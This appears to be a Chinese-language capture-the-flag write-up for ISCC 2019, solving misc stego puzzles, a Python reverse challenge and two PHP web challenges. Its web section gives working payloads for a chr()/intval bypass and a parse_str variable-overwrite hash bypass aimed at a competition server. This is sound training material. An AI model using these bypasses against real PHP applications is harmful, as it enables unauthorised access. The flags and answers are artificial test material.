iscc2019
misc
welcome
加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串011001100110110001100001011001110111101101001001010100110100001101000011010111110101011101000101010011000100001101001111010011010100010101111101
转换为ascii码
得到flag{ISCC_WELCOME}
最危险的地方就是最安全的地方
winhex打开下载的图片。发现藏有zip文件,搜索504B0304,复制选块到新文件打开,有50张图片。最后一张图片的属性->详细信息有一串base64 ZmxhZ3sxNWNDOTAxMn0=
解密得到flag{15cC9012}。最后有个脑洞,提交的时候只提交括号里的。
无法运行的exe
用notepad++打开得到一串字符串iVBORw0KGgAAAAANSUhEUgAAASkAAAEpAQAAAADn4ukvAAACAklEQVR4nO2aQY6bQBBF3wdLsGvvsoSb4JzM+GbmCLmBvcwOFpFAMvwsIJ5ZjsRkcEj3BlR6Un9apa+qLmQ+sC7JRyiIWMQiFrGIfRjrNK+yy0eJi0oYl1i+sbY9YJlt+0roDgBVcwTZttvNte0BGyXV0OXInC9VCyCpfAFt+8FCn04s2ftlm/4/WBcGSTrR5V+36Z6xw/xIDTSELpsSzt/L0I5goNtQ2w6w+XgHAVB034bUguJH/stzLNtO216w4HndGA5gne5H0iXWb6xtN9hFZejTUfKV0I8Jqpuyi3XvJ2FnNwpDaqhuz2CI2bsG4+kA9rVwjwyVW9IJ+7p0HPUrf8IrY8ytWTrhurqxWO6NzDZUt9mW4/Guw8bU0JSAxeVUtACO3rsWW7J38QT3sycUbfbQWxrH7F2HZZ6ARgoPWTWEHmvJ5421/dPY0rXhxHAvB2kyzf34M9ekjbXtBxtTS6pa0gnVFPcci3NsK1Zi+P1qM0+8qxwo2ui9q7HntCJ0SlimFQmcfdtc2x6wP9OKLjw0Jy3pBHA/bq5tD9gyrViGQdyPgyRoqui9n4llD0u+QvYA1xDbis/EhoPsGkJ3kLmcvmTTHWMsBYM9X+nMlw92nz5riVg5rMUGzSM2siFBvgJYql9B2z+NHQDC23986fKaPTDE+96IRSxiEfsb2G/jeCyvdHD3rQAAAABJRU5ErkJggg==
在http://www.tomeko.net/online_tools/base64.php?lang=en将字符串转为dat文件,用winhex打开发现头部右侧显示png但左侧hex值不对(正确应为89 50 4E 47 0D 0A 1A 0A),修改之后将后缀改为png打开,是二维码,扫码得到flag
Aesop’s secret
下载解压之后是一个gif图片,用记事本打开,在末尾找到字符串U2FsdGVkX19QwGkcgD0fTjZxgijRzQOGbCWALh4sRDec2w6xsY/ux53Vuj/AMZBDJ87qyZL5kAf1fmAH4Oe13Iu435bfRBuZgHpnRjTBn5+xsDHONiR3t0+Oa8yG/tOKJMNUauedvMyN4v4QKiFunw==
推测是aes加密,密码猜测是ISCC
两次解密得flag
https://zhuanlan.zhihu.com/p/30323085
他们能在一起吗?
打开是个二维码,扫码得到UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q=
base64解密再url转码,得到PASS{0K_I_L0V3_Y0u!}
不符合flag格式,继续看。
winhex打开二维码图片,再最后发现有you won’t wanner .txt字样,推测含有zip文件,搜索16进制数值504b0304(zip文件头),将选块分离出来,得到加密压缩包。密码时之前扫码得到的。ISCC{S0rrY_W3_4R3_Ju5T_Fr1END}
reverse
简单python
在线反编译
import base64
def encode(message): s = '' for i in message: x = ord(i) ^ 32 x = x + 16 s += chr(x) return base64.b64encode(s) correct = 'eYNzc2tjWV1gXFWPYGlTbQ==' flag = '' print 'Input flag:' flag = raw_input() if encode(flag) == correct: print 'correct' else: print 'wrong' ``
逻辑挺清楚的,将correctbase64.b64decode之后,将每一个字符串的ASCII码值-16,再与32异或得到flag
exp
import base64
correct ='eYNzc2tjWV1gXFWPYGlTbQ=='
s = base64.b64decode(correct)
flag =''
for i in s:
i = chr((ord(i)-16)^32)
flag += i
print flag
web
web1
PHP代码审计
<?php
error_reporting(0);
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';
for ($i = 0; $i < count($value); ++$i) {
if ($value[$i] > 32 && $value[$i] < 127) unset($value);
else $username .= chr($value[$i]);
if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
echo 'Hello '.$username.'!', '<br>', PHP_EOL;
echo $flag, '<hr>';
}
}
highlight_file(__FILE__);
需要几个trick
1.chr()会模256所以value值加上256就可绕过if的判断
2.intval()在处理16进制时存在问题,但强制转换时时正常的.
payload
value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329&value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313&password=0x1233
web4
<?php
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
$query = $parsed["query"];
$parsed_query = parse_str($query);//可变量覆盖
if($parsed_query!=NULL){
$action = $parsed_query['action'];
}
if($action==="auth"){
$key = $_GET["key"];
$hashed_input = hash('sha256', $key);
if($hashed_input!==$hashed_key){
die("<img src='cxk.jpg'>");
}
echo $flag;
}
}else{
show_source(__FILE__);
}?>
payload:39.100.83.188:8066/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408&action=auth&key=this
利用变量覆盖将hashed_key的值替换为key用sha256加密后的值